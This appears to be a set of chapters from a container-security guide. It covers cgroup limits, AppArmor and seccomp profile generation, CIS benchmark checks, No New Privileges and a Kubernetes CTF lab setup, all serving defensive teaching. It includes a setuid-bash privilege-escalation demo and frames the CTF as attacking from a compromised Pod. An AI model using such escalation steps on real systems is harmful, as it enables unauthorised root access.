stress: FAIL: [17272] (451) failed run completed in 55s

$ dmesg
[23834.514678] oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/test,task_memcg=/test,task=stress,pid=17273,uid=0
[23834.514683] Memory cgroup out of memory: Killed process 17273 (stress) total-vm:515860kB, anon-rss:204432kB, file-rss:336kB, shmem-rss:0kB, UID:0 pgtables:444kB oom_score_adj:0
[23834.519784] oom_reaper: reaped process 17273 (stress), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
```
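
The `oom-kill:` line in `dmesg` shows that the kill came from the memory cgroup (`constraint=CONSTRAINT_MEMCG`) rather than from system-wide memory pressure. As a rough sketch, the line can be split into key/value pairs like this. The helper name is hypothetical, and the parser assumes that no value contains a comma, which holds for the sample above but may not hold on multi-node systems.

```python
def parse_oom_kill(line: str) -> dict:
    """Split the key=value pairs of an "oom-kill:" kernel log line."""
    _, _, payload = line.partition("oom-kill:")
    if not payload:
        return {}  # not an oom-kill line
    fields = {}
    for item in payload.strip().split(","):
        key, _, value = item.partition("=")
        fields[key] = value
    return fields


sample = (
    "[23834.514678] oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),"
    "cpuset=/,mems_allowed=0,oom_memcg=/test,task_memcg=/test,"
    "task=stress,pid=17273,uid=0"
)
info = parse_oom_kill(sample)
print(info["constraint"], info["oom_memcg"], info["pid"])
```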

## Using cgroups with Docker

With Docker, you can apply these limits by passing flags such as `-c` (`--cpu-shares`) or `-m` (`--memory`) to the `run` subcommand. See `docker run --help` for details.

```sh
$ docker run --rm -it -m 100m --memory-swappiness=0 ubuntu:20.04 bash
root@36570f483e85:/# stress --vm 2 --vm-bytes 100M
stress: info: [255] dispatching hogs: 0 cpu, 0 io, 2 vm, 0 hdd
stress: FAIL: [255] (415) <-- worker 257 got signal 9
stress: WARN: [255] (417) now reaping child worker processes
stress: FAIL: [255] (415) <-- worker 256 got signal 9
stress: WARN: [255] (417) now reaping child worker processes
stress: FAIL: [255] (451) failed run completed in 0s

$ dmesg
[24555.596613] Memory cgroup out of memory: Killed process 17691 (stress) total-vm:106260kB, anon-rss:45456kB, file-rss:320kB, shmem-rss:0kB, UID:0 pgtables:136kB oom_score_adj:0
[24555.596719] oom_reaper: reaped process 17692 (stress), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
[24555.600384] oom_reaper: reaped process 17691 (stress), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB

$ cat /sys/fs/cgroup/memory/docker/36570f483e8510887b7be178fba3830f1088aa694131c89a18043ef3db220658/memory.limit_in_bytes
104857600
```

---

[^1]: https://man7.org/linux/man-pages/man7/cgroups.7.html


================================================
FILE: source/container-basics.md
================================================
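# Container fundamentals

This chapter introduces the underlying technologies that Linux containers are built on.  
To isolate themselves from the host, Linux containers use a defense-in-depth model that combines namespaces and cgroups with mechanisms such as seccomp and LSMs.  
We will try out each technology hands-on and follow how an ordinary process becomes a container.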


================================================
FILE: source/hardening/README.md
================================================
# Hardening Container

This chapter introduces ways to operate containers more securely.  
It covers automatic generation of AppArmor and seccomp profiles, secure OCI / CRI runtimes, and container monitoring.


================================================
FILE: source/hardening/apparmor.md
================================================
# AppArmor

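AppArmor serves as the last line of defense when a container is compromised and the other protection layers have been bypassed. Applying a profile suited to the application therefore lets you operate containers more securely.  
On the other hand, creating a profile is costly: the syntax is complex, and you need to know which files the application accesses.

This section introduces relatively easy ways to generate AppArmor profiles.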

## Listing changed files with `docker diff`

`docker diff` lists the files and directories that have changed in a container. For example, starting an nginx container and running `docker diff` against it yields the following list.

```sh
ubuntu@sandbox:~$ docker run --rm -it nginx:latest
...

ubuntu@sandbox:~$ docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS               NAMES
ae9a66bf223e        nginx:latest        "/docker-entrypoint.…"   3 minutes ago       Up 3 minutes        80/tcp              sweet_archimedes
ubuntu@sandbox:~$ docker diff ae9a
C /run
A /run/nginx.pid
C /var
C /var/cache
C /var/cache/nginx
A /var/cache/nginx/proxy_temp
A /var/cache/nginx/scgi_temp
A /var/cache/nginx/uwsgi_temp
A /var/cache/nginx/client_temp
A /var/cache/nginx/fastcgi_temp
C /etc
C /etc/nginx
C /etc/nginx/conf.d
C /etc/nginx/conf.d/default.conf
```
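
In this output, `A` marks an added path and `C` a changed one (`D` would mark a deleted one). As a minimal sketch, the output can be grouped by change type to get a first list of paths a profile may need to make writable; the function name is hypothetical.

```python
from collections import defaultdict


def group_docker_diff(output: str) -> dict:
    """Group `docker diff` output lines by change type (A, C, or D)."""
    groups = defaultdict(list)
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        kind, _, path = line.partition(" ")
        groups[kind].append(path)
    return dict(groups)


sample = """C /run
A /run/nginx.pid
C /var
A /var/cache/nginx/proxy_temp"""
changes = group_docker_diff(sample)
print(changes["A"])
```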

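Note, however, that `docker diff` only shows files that **were changed**, so it cannot report files that were merely `open`ed or `read`.  
To list those files, you can trace events with a technology such as eBPF.

For example, a tool that provides functionality equivalent to [opensnoop.py][1] and reports only events from containers can list the opened files as follows.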

```sh
$ sudo ./cxray
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"bash","fname":"/","pid":"1800","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:40+09:00"}
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"cat","fname":"/etc/ld.so.cache","pid":"2371","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:41+09:00"}
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"cat","fname":"/lib/x86_64-linux-gnu/libc.so.6","pid":"2371","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:41+09:00"}
{"data":{"container_id":"4604f9e03","event":{"name":"open","data":{"comm":"cat","fname":"/etc/passwd","pid":"2371","ret":"3","uid":"0"}}},"level":"info","msg":"","time":"2020-11-15T15:31:41+09:00"}
```
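
Event logs in this JSON-lines shape are straightforward to post-process. The sketch below collects the distinct file names opened by one container. It assumes the record layout shown above (`data.container_id`, `data.event.name`, `data.event.data.fname`); the function name is hypothetical and the sample records are trimmed to the fields that are used.

```python
import json


def opened_files(log_lines, container_id):
    """Return the sorted, de-duplicated paths opened by one container."""
    paths = set()
    for raw in log_lines:
        data = json.loads(raw)["data"]
        event = data["event"]
        if data["container_id"] == container_id and event["name"] == "open":
            paths.add(event["data"]["fname"])
    return sorted(paths)


sample = [
    '{"data":{"container_id":"4604f9e03","event":{"name":"open",'
    '"data":{"comm":"cat","fname":"/etc/passwd"}}}}',
    '{"data":{"container_id":"4604f9e03","event":{"name":"open",'
    '"data":{"comm":"cat","fname":"/etc/ld.so.cache"}}}}',
]
files = opened_files(sample, "4604f9e03")
print(files)
```

The resulting list can serve as a starting point for the read rules of a profile.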

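## Generating AppArmor profiles easily

Because the AppArmor profile syntax is hard to read, it is easy to end up with unintended settings.  
[genuinetools/bane][2] is a tool that helps with this.

It generates an AppArmor profile from a TOML file in which you simply list the commands and file paths to allow or deny.

For example, prepare a TOML file like the following.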

```toml
Name = "sample"

[Filesystem]
# read only paths for the container
ReadOnlyPaths = [
	"/bin/**",
	"/boot/**",
	"/dev/**",
	"/etc/**",
	"/home/**",
	"/lib/**",
	"/lib64/**",
	"/media/**",
	"/mnt/**",
	"/opt/**",
	"/proc/**",
	"/root/**",
	"/sbin/**",
	"/srv/**",
	"/tmp/**",
	"/sys/**",
	"/usr/**",
]

# paths where you want to log on write
LogOnWritePaths = [
	"/**"
]

# paths where you can write
WritablePaths = [
	"/var/run/nginx.pid"
]

# allowed executable files for the container
AllowExec = [
	"/usr/sbin/nginx"
]

# denied executable files
DenyExec = [
	"/bin/dash",
	"/bin/sh",
	"/usr/bin/top"
]
```

Running `bane` generates the AppArmor profile and runs `apparmor_parser` to load it.

```sh
ubuntu@bpf:~$ sudo ./bane sample.toml
Profile installed successfully you can now run the profile with
`docker run --security-opt="apparmor:docker-sample"`
ubuntu@bpf:~$ docker run --rm -it --security-opt="apparmor:docker-sample" nginx:latest bash
root@03b91bd97550:/# /bin/dash
bash: /bin/dash: Permission denied
root@03b91bd97550:/# sh
bash: /bin/sh: Permission denied
```

You can also generate a profile with `docker-slim`. See the [documentation][3] for how to install `docker-slim`.

Run `docker-slim build` and execute some commands inside the container. Because no HTTP port is exposed in this example, `--http-probe=false` is passed.

```sh
ubuntu@vm:~/$ ./docker-slim build ubuntu:latest --http-probe=false
docker-slim: message='join the Gitter channel to ask questions or to share your feedback' info='https://gitter.im/docker-slim/community'
docker-slim: message='join the Discord server to ask questions or to share your feedback' info='https://discord.gg/9tDyxYS'
docker-slim[build]: info=probe message='changing continue-after from probe to enter because http-probe is disabled'
docker-slim[build]: state=started
docker-slim[build]: info=params target=ubuntu:latest continue.mode=enter rt.as.user=true keep.perms=true
docker-slim[build]: state=image.inspection.start
docker-slim[build]: info=image id=sha256:9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b size.bytes=72875723 size.human=73 MB
docker-slim[build]: info=image.stack index=0 name='ubuntu:latest' id='sha256:9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b'
docker-slim[build]: state=image.inspection.done
docker-slim[build]: state=container.inspection.start
docker-slim[build]: info=container status=created name=dockerslimk_6887_20201115065250 id=efa234652587e1367e9572b72abf534eb4e8190c603c5a46e77177a0a78094bd
docker-slim[build]: info=cmd.startmonitor status=sent
docker-slim[build]: info=event.startmonitor.done status=received
docker-slim[build]: info=container name=dockerslimk_6887_20201115065250 id=efa234652587e1367e9572b72abf534eb4e8190c603c5a46e77177a0a78094bd target.port.list=[] target.port.info=[] message='YOU CAN USE THESE PORTS TO INTERACT WITH THE CONTAINER'
docker-slim[build]: info=continue.after mode=enter message='provide the expected input to allow the container inspector to continue its execution'
docker-slim[build]: info=prompt message='USER INPUT REQUIRED, PRESS <ENTER> WHEN YOU ARE DONE USING THE CONTAINER'

docker-slim[build]: state=container.inspection.finishing
docker-slim[build]: state=container.inspection.artifact.processing
docker-slim[build]: state=container.inspection.done
docker-slim[build]: state=building message='building optimized image'
docker-slim[build]: state=completed
docker-slim[build]: info=results status='MINIFIED BY 9.95X [72875723 (73 MB) => 7322511 (7.3 MB)]'
docker-slim[build]: info=results  image.name=ubuntu.slim image.size='7.3 MB' data=true
docker-slim[build]: info=results  artifacts.location='/home/ubuntu/dist_linux/.docker-slim-state/images/9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b/artifacts'
docker-slim[build]: info=results  artifacts.report=creport.json
docker-slim[build]: info=results  artifacts.dockerfile.original=Dockerfile.fat
docker-slim[build]: info=results  artifacts.dockerfile.new=Dockerfile
docker-slim[build]: info=results  artifacts.seccomp=ubuntu-seccomp.json
docker-slim[build]: info=results  artifacts.apparmor=ubuntu-apparmor-profile
docker-slim[build]: state=done
docker-slim[build]: info=report file='slim.report.json'
docker-slim: message='join the Gitter channel to ask questions or to share your feedback' info='https://gitter.im/docker-slim/community'
docker-slim: message='join the Discord server to ask questions or to share your feedback' info='https://discord.gg/9tDyxYS'
```

When the run finishes, the AppArmor profile is generated at `/home/ubuntu/dist_linux/.docker-slim-state/images/9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b/artifacts/ubuntu-apparmor-profile`, as the messages above indicate.

With the help of tools like these, generating a profile becomes straightforward.

[1]: https://github.com/iovisor/bcc/blob/master/tools/opensnoop.py "https://github.com/iovisor/bcc/blob/master/tools/opensnoop.py"
[2]: https://github.com/genuinetools/bane "https://github.com/genuinetools/bane"
[3]: https://github.com/docker-slim/docker-slim#installation "https://github.com/docker-slim/docker-slim#installation"


================================================
FILE: source/hardening/cis-benchmark.md
================================================
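# Securing Docker in line with the CIS Benchmarks

The CIS Benchmarks[^1] are best-practice guidelines published by CIS (Center for Internet Security), an organization that works on standardizing internet security.  
In addition to operating systems, the CIS Benchmarks cover middleware such as Apache, and Docker is included as well.[^2]

A distinguishing feature of the CIS Benchmarks is that each item states clearly what to check and how to remediate it, which makes them easy to turn into tools. Tools such as docker-bench-security[^3] already exist, so the benchmarks are easy to try.

## Checking CIS Benchmark compliance with docker-bench-security

docker-bench-security is a tool that checks whether a host complies with the CIS Docker Benchmark.  
It checks the following seven areas.

1. Host Configuration: the configuration of the host that runs the Docker daemon
2. Docker daemon configuration: the settings of the Docker daemon
3. Docker daemon configuration files: the configuration, such as permissions, of the files used by the Docker daemon
4. Container Images and Build File: the security of built images
5. Container Runtimes: the container runtime
6. Docker Security Operations: best practices for operating containers
7. Docker Swarm Configuration: the settings of Docker Swarm mode

It can be run as a container with a command like the following.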

```sh
ubuntu@sandbox:~$ docker run -it --net host --pid host --userns host --cap-add audit_control \
     -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
     -v /etc:/etc:ro \
     -v /usr/bin/containerd:/usr/bin/containerd:ro \
     -v /usr/bin/runc:/usr/bin/runc:ro \
     -v /usr/lib/systemd:/usr/lib/systemd:ro \
     -v /var/lib:/var/lib:ro \
     -v /var/run/docker.sock:/var/run/docker.sock:ro \
     --label docker_bench_security \
     docker/docker-bench-security
```

A report is then printed. Checks with no problems are reported as `PASS`, while items that do not comply are reported as `WARN`.

```
[INFO] 1 - Host Configuration
[WARN] 1.1  - Ensure a separate partition for containers has been created
[NOTE] 1.2  - Ensure the container host has been Hardened
[INFO] 1.3  - Ensure Docker is up to date
[INFO]      * Using 19.03.13, verify is it up to date as deemed necessary
[INFO]      * Your operating system vendor may provide support and security maintenance for Docker
[INFO] 1.4  - Ensure only trusted users are allowed to control Docker daemon
[INFO]      * docker:x:999:ubuntu
[WARN] 1.5  - Ensure auditing is configured for the Docker daemon
[WARN] 1.6  - Ensure auditing is configured for Docker files and directories - /var/lib/docker
[WARN] 1.7  - Ensure auditing is configured for Docker files and directories - /etc/docker
...
```
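
When the report is long, it can help to pull out only the failing checks. The following is a minimal sketch that counts the result levels and collects the `WARN` items. It assumes plain-text output in the shape shown above (no terminal color codes), and the function name is hypothetical.

```python
import re
from collections import Counter

# "[LEVEL] <check id> - <title>"; detail lines such as "[INFO]      * ..." do not match
LINE = re.compile(r"^\[(PASS|WARN|INFO|NOTE)\]\s+(\d+(?:\.\d+)*)\s+-\s+(.*)$")


def summarize(report: str):
    """Return (count per level, list of (check id, title) for WARN items)."""
    counts = Counter()
    warnings = []
    for line in report.splitlines():
        match = LINE.match(line.strip())
        if not match:
            continue
        level, check_id, title = match.groups()
        counts[level] += 1
        if level == "WARN":
            warnings.append((check_id, title))
    return counts, warnings


sample = """[INFO] 1 - Host Configuration
[WARN] 1.1  - Ensure a separate partition for containers has been created
[NOTE] 1.2  - Ensure the container host has been Hardened
[INFO]      * docker:x:999:ubuntu
[WARN] 1.5  - Ensure auditing is configured for the Docker daemon"""
counts, warnings = summarize(sample)
print(counts["WARN"], [check_id for check_id, _ in warnings])
```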

As an example, let's address `1.5 Ensure auditing is configured for the Docker daemon`.  
According to the CIS Benchmark, this item indicates that auditing is not enabled for the Docker daemon. Unless you run rootless Docker, the Docker daemon runs with root privileges, so it is a good idea to audit it and collect security logs.

The Remediation section of the CIS Benchmark describes adding `-w /usr/bin/dockerd -k docker` to the auditd rules.  
Apply that change as described, then run the command from the Audit section to verify it.

```
ubuntu@sandbox:~$ sudo auditctl -l | grep /usr/bin/dockerd
-w /usr/bin/dockerd -p rwxa -k docker
```

This looks fine. Running docker-bench-security again confirms that the item is now `[PASS]`.

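## Securing images

Beyond "do not include secrets" and "update vulnerable packages", which were covered in [Docker image security](../security/image/README.md), there are several other points to watch when securing Docker images.  
The CIS Benchmark defines criteria for these as well, under "4. Container Images and Build File Configuration", and docker-bench-security can scan for them.  
However, docker-bench-security does not implement some of the Not Scored items, which do not count toward the score. Examples include:

* Do not include secrets in the Dockerfile
* Remove setuid / setgid binaries

In addition to the criteria in the CIS Benchmark, there are other considerations such as avoiding the `latest` tag and not using the `sudo` command.  
goodwithtech/dockle[^4] is a tool that detects these issues.

For example, running it against the `nginx:latest` image produces the following result.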

```
ubuntu@sandbox:~$ dockle nginx:latest
WARN    - CIS-DI-0001: Create a user for the container
        * Last user should not be root
WARN    - DKL-DI-0006: Avoid latest tag
        * Avoid 'latest' tag
INFO    - CIS-DI-0005: Enable Content trust for Docker
        * export DOCKER_CONTENT_TRUST=1 before docker pull/build
INFO    - CIS-DI-0006: Add HEALTHCHECK instruction to the container image
        * not found HEALTHCHECK statement
INFO    - CIS-DI-0008: Confirm safety of setuid/setgid files
        * setuid file: bin/mount urwxr-xr-x
        * setuid file: usr/bin/gpasswd urwxr-xr-x
        * setgid file: usr/bin/expiry grwxr-xr-x
        * setuid file: bin/su urwxr-xr-x
        * setgid file: usr/bin/wall grwxr-xr-x
        * setuid file: usr/bin/chfn urwxr-xr-x
        * setuid file: usr/bin/newgrp urwxr-xr-x
        * setuid file: usr/bin/chsh urwxr-xr-x
        * setuid file: bin/umount urwxr-xr-x
        * setgid file: sbin/unix_chkpwd grwxr-xr-x
        * setgid file: usr/bin/chage grwxr-xr-x
        * setuid file: usr/bin/passwd urwxr-xr-x
```

The result shows that the image runs as the root user and contains several setuid binaries.
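
To illustrate what a setuid / setgid check looks at, the sketch below walks a directory tree and reports regular files with either bit set. It is a simplified illustration, not how dockle is implemented; the function name is hypothetical, and the demo uses a temporary directory instead of a real image root filesystem.

```python
import os
import stat
import tempfile


def find_setid_files(root: str):
    """Return (kind, path) pairs for regular files with setuid/setgid bits."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # file vanished or is unreadable
            if not stat.S_ISREG(mode):
                continue
            if mode & stat.S_ISUID:
                found.append(("setuid", path))
            if mode & stat.S_ISGID:
                found.append(("setgid", path))
    return found


# Demo: create one setuid file in a scratch directory and scan it
with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, "demo")
    open(target, "w").close()
    os.chmod(target, 0o4755)
    result = find_setid_files(tmp)
print(result)
```

Pointed at an unpacked image root filesystem, the same function would list candidates to review or remove.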

---

[^1]: https://www.cisecurity.org/cis-benchmarks/
[^2]: https://www.cisecurity.org/benchmark/docker/
[^3]: https://github.com/docker/docker-bench-security
[^4]: https://github.com/goodwithtech/dockle


================================================
FILE: source/hardening/monitoring.md
================================================
# Container monitoring

TBD


================================================
FILE: source/hardening/no-new-privileges.md
================================================
# No New Privileges

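The Linux kernel has a mechanism called No New Privileges[^1] that prevents a process and its child processes from gaining new privileges through `execve`.

If a container contains a setuid binary, it can lead to privilege escalation. With Docker, passing the `--security-opt=no-new-privileges:true` flag prevents this.

Prepare a setuid copy of bash named `mybash` as follows.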

```shell
$ cat Dockerfile
FROM ubuntu:18.04
RUN cp /bin/bash /bin/mybash && chmod +s /bin/mybash
RUN useradd -ms /bin/bash newuser
USER newuser
CMD ["/bin/bash"]
```

With `no-new-privileges:false`, the shell runs with `euid=0`, that is, with root privileges.

```shell
$ docker run --security-opt=no-new-privileges:false -it --rm test:latest
newuser@3ee2685cd961:/$ id
uid=1000(newuser) gid=1000(newuser) groups=1000(newuser)
newuser@3ee2685cd961:/$ /bin/mybash -p
mybash-4.4# id
uid=1000(newuser) gid=1000(newuser) euid=0(root) egid=0(root) groups=0(root)
```

With `no-new-privileges:true`, newly executed programs cannot gain privileges, so the process never gets `euid=0` even though the binary is setuid.

```shell
$ docker run --security-opt=no-new-privileges:true -it --rm test:latest
newuser@80f241191a07:/$ /bin/mybash -p
newuser@80f241191a07:/$ id
uid=1000(newuser) gid=1000(newuser) groups=1000(newuser)
```
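
On reasonably recent kernels, whether the flag is active for a process can be read from the `NoNewPrivs` field in `/proc/<pid>/status`. The following is a small sketch that parses that field from the status text; the function name is hypothetical, and the sample text is a shortened stand-in for a real status file.

```python
def no_new_privs_enabled(status_text: str) -> bool:
    """Return True if the NoNewPrivs field of a /proc status dump is 1."""
    for line in status_text.splitlines():
        if line.startswith("NoNewPrivs:"):
            return line.split(":", 1)[1].strip() == "1"
    return False  # field absent, for example on older kernels


sample = "Name:\tbash\nNoNewPrivs:\t1\nSeccomp:\t2\n"
print(no_new_privs_enabled(sample))
```

Inside a container, passing the contents of `/proc/self/status` to this function would show whether the option took effect.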

[^1]: https://www.kernel.org/doc/html/latest/userspace-api/no_new_privs.html "https://www.kernel.org/doc/html/latest/userspace-api/no_new_privs.html"


================================================
FILE: source/hardening/runtime.md
================================================
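# Runtime security

Container security depends on isolation from the host. If the runtime or the kernel has a vulnerability, it can allow a breakout from the container to the host.

In some cases you can strengthen isolation by switching to a different runtime. By default Docker uses runc as the OCI runtime and containerd as the CRI runtime, but these can be replaced with alternatives such as gVisor or kata-containers.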

## gVisor

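gVisor[^1] is an application kernel for containers that intercepts the system calls issued inside a container. gVisor filters and substitutes the intercepted system calls before they are executed. In other words, it behaves like the host kernel from the container's point of view, which reduces the impact on the real host.

On the other hand, system calls that gVisor does not support cannot be issued, so as of 2020-11-15 tools such as tcpdump cannot be run.  
Intercepting system calls also introduces overhead.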

## kata-containers

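kata-containers[^2] is a runtime that runs containers with VM-like isolation. Containers run on QEMU / KVM / Firecracker and do not share a kernel with the host, so the isolation can be considered very strong.  
Attack techniques against such virtualized containers are described in detail in the Black Hat USA 2020 talk "Escaping Virtualized Containers"[^3].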

## Unikernel

TBD

---

[^1]: https://gvisor.dev/
[^2]: https://katacontainers.io/
[^3]: https://i.blackhat.com/USA-20/Thursday/us-20-Avrahami-Escaping-Virtualized-Containers.pdf


================================================
FILE: source/hardening/seccomp.md
================================================
# seccomp

As with AppArmor, a seccomp profile is difficult to generate without tracing the events of the application running in the container.  
You can trace the issued system calls with `strace` or eBPF, but `docker-slim` is useful here as well.

Running it the same way as for AppArmor generates a seccomp profile at `/home/ubuntu/dist_linux/.docker-slim-state/images/9140108b62dc87d9b278bb0d4fd6a3e44c2959646eb966b86531306faa81b09b/artifacts/ubuntu-seccomp.json`.

The generated seccomp profile explicitly lists the system calls that are allowed.

```json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": [
    "SCMP_ARCH_X86_64"
  ],
  "syscalls": [
    {
      "names": [
        "getgid",
        "read",
        "setuid",
        "dup3",
        "getppid",
        ...
      ],
      "action": "SCMP_ACT_ALLOW",
      "includes": {},
      "excludes": {}
    }
  ]
}
```
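
The profile follows a deny-by-default pattern: `defaultAction` returns an error, and only the listed names are allowed. The following is a minimal sketch of how such an allowlist could be assembled from system call names you have observed yourself, for example with `strace`. The function name is hypothetical, only fields that appear in the profile above are emitted, and this is not how `docker-slim` builds its profile.

```python
import json


def build_allowlist_profile(syscalls, arch="SCMP_ARCH_X86_64"):
    """Build a deny-by-default seccomp profile that allows `syscalls`."""
    return {
        "defaultAction": "SCMP_ACT_ERRNO",
        "architectures": [arch],
        "syscalls": [
            {"names": sorted(set(syscalls)), "action": "SCMP_ACT_ALLOW"}
        ],
    }


# Duplicates in the observed list are collapsed
profile = build_allowlist_profile(["read", "getgid", "read", "dup3"])
print(json.dumps(profile, indent=2))
```

The printed JSON can be saved to a file and passed to Docker with `--security-opt seccomp=<file>`.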


================================================
FILE: source/introduction.md
================================================
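# 1. Container fundamentals

Linux containers rely on a variety of Linux kernel mechanisms to isolate themselves from the host.  
They follow a defense-in-depth approach: multiple protection layers are placed around the areas where attacks can occur, so that the layers are not all vulnerable to the same kind of attack.  
This chapter covers these protection mechanisms.

## [Namespace](./namespace/README.md)

A brief introduction to namespaces, the core of resource isolation in Linux containers.

## [chroot and pivot_root](./namespace/chroot-and-pivot_root.md)

Introduces `chroot` and `pivot_root`, the two mechanisms needed to isolate a container's filesystem.  
It also covers the problems with chroot.

## [Capability](./capability/README.md)

Introduces capabilities, the Linux mechanism for granting privileges in a fine-grained way.

## [seccomp](./seccomp/README.md)

Introduces seccomp, which restricts the system calls a process can invoke.

## [AppArmor](./lsm/apparmor.md)

Introduces AppArmor, a Linux Security Module used as one of the container protection features on distributions such as Ubuntu and Debian.

## [cgroup](./cgroup/README.md)

Introduces cgroups, the mechanism for limiting the resource usage of processes.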

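# 2. Container security and attack examples

Covers attack techniques against Linux containers and their security.

## [Breakout Container](./security/breakout-to-host.md)

Escaping from a container to the host is called a breakout, jailbreak, or escape. This section uses attack examples to show how a breakout to the host becomes possible when excessive privileges are granted, for example with privileged containers.

## [Sensitive file mount](./security/sensitive-file-mount.md)

Introduces attack examples in which mounting specific files allows a breakout to the host.

## [DoS](./security/DoS.md)

Introduces examples of DoS attacks from a container against the host.

## [Adding users to groups that can run containers](./security/adding-a-user-to-group.md)

Introduces the dangers of adding ordinary users to the groups that are allowed to operate Docker or LXD.

## [AppArmor Bypass](./security/apparmor-bypass.md)

Introduces ways to bypass AppArmor.

## [seccomp Bypass](./security/seccomp-bypass.md)

Introduces ways to bypass seccomp.

## [Storing secrets in image layers](./security/image/secrets-in-layer.md)

If secrets are included in an image at build time, they can sometimes be extracted from the resulting image.  
This section introduces how image layers work, with concrete examples.

## [Image scanners](./security/image/scanner.md)

Introduces image scanners, which detect vulnerabilities in the software contained in Docker images, and vulnerabilities in the scanners themselves.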

# 3. Hardening Container

Introduces ways to run containers more safely.

## [No New Privileges](hardening/no-new-privileges.md)

Introduces No New Privileges, which prevents child processes from gaining privileges.

## [AppArmor](hardening/apparmor.md)

Introduces topics such as automatic generation of AppArmor profiles.

## [seccomp](hardening/seccomp.md)

Introduces topics such as automatic generation of seccomp profiles.

## [runtime](hardening/runtime.md)

Introduces CRI / OCI runtimes other than containerd / runc that help protect the host from runtime and kernel vulnerabilities.

## [monitoring](hardening/monitoring.md)

TBD

## [CIS Benchmark](hardening/cis-benchmark.md)

Introduces the CIS Benchmark and how to check compliance with tools.


================================================
FILE: source/kubernetes/hardening/README.md
================================================
TBD


================================================
FILE: source/kubernetes/hardening/secret-management.md
================================================
TBD


================================================
FILE: source/kubernetes/security/README.md
================================================
# Kubernetes Security

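This chapter introduces example attacks against Kubernetes, a container orchestration tool, and their countermeasures.

![Example attack vectors in a Kubernetes cluster](./img/kubernetes-attack-vector.png)

This figure shows attack vectors in a Kubernetes cluster. Besides the Kubernetes components themselves, a cluster is often tightly integrated with CI / CD tools, dashboards, and similar applications. If an attacker gains access to them, cluster administrator privileges may be obtained, so authentication and authorization for those applications must also be configured properly.  
Kubernetes has many components, and there are naturally attack paths other than those shown here, so it is important to know the attack surface of your cluster.

The ATT&CK-like Kubernetes attack matrix created by Microsoft is a helpful reference for this.[^1]

![Kubernetes Attack Matrix from Microsoft](https://www.microsoft.com/security/blog/wp-content/uploads/2020/04/k8s-matrix.png)

This chapter cannot cover every attack path listed there, but it focuses on cluster misconfigurations and on cases where a container has been compromised, and introduces example attacks and their countermeasures.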

---

[^1]: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/


================================================
FILE: source/kubernetes/security/ctf.md
================================================
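# Learning Kubernetes security through a CTF

So far we have studied the security of Linux containers and Kubernetes. From here, let's learn in a more hands-on way through a CTF (Capture The Flag) style game.

## Overview of kubectf

A CTF is a game in which you solve given challenges and find a string in a specific format, called a flag.[^1]  
For this exercise, [kubectf](https://github.com/mrtc0/kubectf) is provided.  
kubectf uses minikube to create a practice cluster on your local machine. Each challenge lives in its own namespace, and the goal is to find a flag hidden somewhere on the Kubernetes node or in a resource of the same namespace.  
kubectf assumes that you have broken into a Pod, and you work on each challenge from a container named `victim`.  
Therefore, you must not modify manifests from outside the Pod as a cluster administrator or SSH into the node. Act strictly as an attacker who has broken into a vulnerable Pod, and work within the privileges available from there.

For example, for the `treasure-hunt` challenge, switch to the `treasure-hunt` namespace, enter the Pod named `victim`, and work on the challenge from inside it.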

```shell
❯ kubens treasure-hunt

❯ kubectl get pods
NAME                              READY   STATUS    RESTARTS   AGE
docker-registry-6b5b55b44-zgvxf   1/1     Running   0          42m
victim-68bcd4465f-q4pkb           1/1     Running   0          42m

# Work on the challenge from inside the victim container
❯ kubectl exec -it victim-68bcd4465f-q4pkb sh
/ #
```

## Setting up kubectf

Setting up kubectf requires the following software.

* minikube
* kubectl
* Docker Engine

See each tool's manual for installation instructions.[^2]

Once they are installed, clone the kubectf repository and run the setup script.

```shell
$ git clone https://github.com/mrtc0/kubectf.git
$ cd kubectf && ./setup.sh
```

After the setup script finishes, confirm that the Pods in every namespace are running.

```shell
❯ kubectl get ns
NAME                    STATUS   AGE
can-you-keep-a-secret   Active   4d17h
default                 Active   4d17h
gatekeeper-system       Active   4d17h
kube-node-lease         Active   4d17h
kube-public             Active   4d17h
kube-system             Active   4d17h
mountme                 Active   4d17h
mountme2                Active   4d17h
sniff                   Active   41h
treasure-hunt           Active   4d17h

❯ kubectl get pods --all-namespaces
NAMESPACE               NAME                                            READY   STATUS    RESTARTS   AGE
can-you-keep-a-secret   victim-56958dffc6-ddfhk                         1/1     Running   1          4d17h
gatekeeper-system       gatekeeper-audit-7d99d9d87d-xqsnf               1/1     Running   2          4d17h
gatekeeper-system       gatekeeper-controller-manager-f94cc7dfc-56f4v   1/1     Running   2          4d17h
gatekeeper-system       gatekeeper-controller-manager-f94cc7dfc-5qfm4   1/1     Running   2          4d17h
gatekeeper-system       gatekeeper-controller-manager-f94cc7dfc-b77rm   1/1     Running   3          4d17h
kube-system             coredns-f9fd979d6-8tgk8                         1/1     Running   2          4d17h
kube-system             etcd-minikube                                   1/1     Running   2          4d17h
kube-system             kube-apiserver-minikube                         1/1     Running   2          4d17h
kube-system             kube-controller-manager-minikube                1/1     Running   2          4d17h
kube-system             kube-proxy-ljjkx                                1/1     Running   2          4d17h
kube-system             kube-scheduler-minikube                         1/1     Running   2          4d17h
